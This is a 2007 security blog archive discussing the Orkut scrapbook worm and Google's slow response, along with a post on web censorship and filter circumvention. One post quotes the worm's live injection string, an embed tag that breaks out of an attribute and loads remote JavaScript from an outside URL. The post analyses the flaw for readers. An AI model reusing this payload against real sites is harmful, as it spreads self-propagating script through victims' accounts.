Security: December 2007 Archives
Orkut finally posted a notice about the worm. I certainly appreciate that they worked quickly on fixing the problem. However, I still believe there should have been an ongoing dialog with their users. When you put together a security response plan, you need to include not only an engineering team, but also P.R. resources to handle communicating with the outside world. "Trust" is the most important commodity a social network has. The panic you feel when you think your accounts, and perhaps computer, are infected, is not going to be erased by an after-the-fact message two days later. All social networks should have a plan in place that includes (at a minimum) telling people that a solution is being developed, and ideally includes periodic updates on the progress. Providing additional information about the problem as it becomes available would also be great, but the primary goal is to show that users' concerns are being taken seriously, and that people are actively working to fix the problem. Responsiveness, concern, and information, will help ensure that people maintain their trust in your service.
I had to head off and get some sleep last night, so I didn't have time to try and track this down, but others did. I've attached the javascript code below for those who want to see it.
I have to say, I'm disappointed by Google's response time on this issue. I noticed the problem Tuesday evening around 10 or 11pm EST. As soon as I knew it was a worm I posted a support request to Orkut (which, btw, is not easy—they keep redirecting you to tips on protecting your computer). Once I had more details and posted my original link, I filed another report, this time through a security form (although the only way to do so was to claim that my account had been compromised). That was between midnight and 1am EST. This morning when I went to check around 7am EST, the worm was still spreading.
I would have hoped that they could have gotten the reports, paged the appropriate people, and then turned off scrapbooks, or disabled HTML scrapbooks, until things were under control. If that wasn't possible (and I understand that making on-the-fly code changes to a large distributed system is not always the simplest thing), then they should have shut Orkut down. And at the very least, I would expect to see an explanation and apology on Orkut.
The issue isn't whether or not the worm was dangerous. The issue is that I now don't trust Google to respond quickly the next time there's a worm. And the next one might not be so benign.
Ironically, this has caused a number of my friends (who like myself, haven't used Orkut in quite a while) to update their profiles. It may even increase Orkut's overall traffic in the States, since they've largely been forgotten here.
The original source file is no longer in place, so the worm has hopefully stopped. Since Google has posted nothing about it on the Orkut site or blog, I have no idea whether the underlying flaw has been fixed.
Looking at the code, my guess is that the hole is here:
"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";
There is a "script" attribute provided to the embed of a Flash video. Letting the script element through allowed for arbitrary javascript execution in the context of the scrapbook page. Definitely not a good thing. It would certainly be possible for such a script to do quite a bit of damage. I'm sure there are more detailed examinations of the problem on the net. Searching around it's clear that this is probably the third variation of the exploit that has been used in recent days.
Javascript code can be found below the fold.
I haven't been able to find a copy of the source yet, but the method of transmittal looks pretty straightforward.
You get an email notification (or find out on Orkut) that you have a new scrapbook entry. It's from a friend. It says.
2008 vem ai... que ele comece mto bem para vc
There's no need to click on anything, just viewing it does the trick. The scrap deletes itself, and adds you to the Orkut Community "Infectados pelo Vírus do Orkut". That group, as I write this, is gaining members at a rate of at least one hundred per minute.
A quick (Google :-) translation of the description of the group produces the following:
CALMA!
If you came into this community, make sure that no data was stolen and not your will, that is not my goal.
If I are sure at the end of all, this community should is lotada of people.
This just to show how orkut may be dangerous, you came up here without clicking absolutely no link malicious, everything was done reading scraps.
Orkut allows friend-to-friend scraps to contain HTML. Presumably there's a bug somewhere in the HTML filter which is allowing malicious Javascript to get through.
It does not appear at first glance that the worm does anything more dangerous than pass itself on to one or more of your friends. I think it unlikely that it would be able to steal your password, although it could potentially access other private information.
[Update. According to a posting on the Community site by the author of the virus, it can be blocked by blocking Flash.]
Well, many people do not like to join the community, is a right that you have, although it is only a joke.
But, just as I am doing it, someone else can do to try to hurt someone.
As some people asked, I will teach how to protect here.
Firefox (easier):
- Install the extension Flashblock
[Https: / / addons.mozilla.org/en-US/firefox/addon/433]
- Restart Firefox and ready
If you do not have Firefox, download here:
Http://www.mozilla.com/en-US/firefox/
Internet Explorer:
- Go to the Tools Menu-> Internet Options
- Click on the Security tab
- In Zone of web content let selected Internet
- Click Custom Level ...
- Find the part where is Plugi-ins and ActiveX controls of the
- Disable the option Run controls and plugi-ins of ActiveX
With that you will no longer see for example the videos from YouTube, both in and outside Orkut, but at least you will be safe.
I suggest you download Firefox because it is easier to enable and disable.
Yesterday my daughter Shireen asked me again to help her get around the filters at school. She can get to her email, but she can't get to DeviantArt, where she posts photos and artwork. Nor can she use her IM client, and she'd wanted to ask me a question while she was at school. I pointed her at a web IM client that would probably work, and promised to set up an encrypted proxy server on our web site so she could browse wherever she wanted. I also pointed out that her problem is in miniature the same problem faced by millions of folks in Iran, China and other countries that try to restrict the flow of information to and from the internet.
While I can sympathize (in theory) with people who see the internet as a corrupting influence, I do not sympathize with the view of "the State as parent", and furthermore, I believe the correct solution to corrupting influences (whether you are a parent or a country) is education and knowledge—not hiding them under a rock and pretending they don't exist. If your meme can't win the battle of information, then it doesn't deserve to survive. (I suppose it's not terribly surprising that such a darwinist approach to ideas doesn't go over well with theocracies. :-) And of course in the case of Iran and China, two of the biggest censorship offenders (how nice to know that Iran is using American software to do the job), the censorship has far more to do with maintaining power than any particular ideology.
In any case, while looking for something completely different this morning, I came across the following Firefox web browser extension.
I actually hadn't realized that Iran blocked Flickr, there's an active Iranian community there.
I suppose I shouldn't be surprised. But it's a pity, Flickr's a great way to see what Iran really looks like right now.
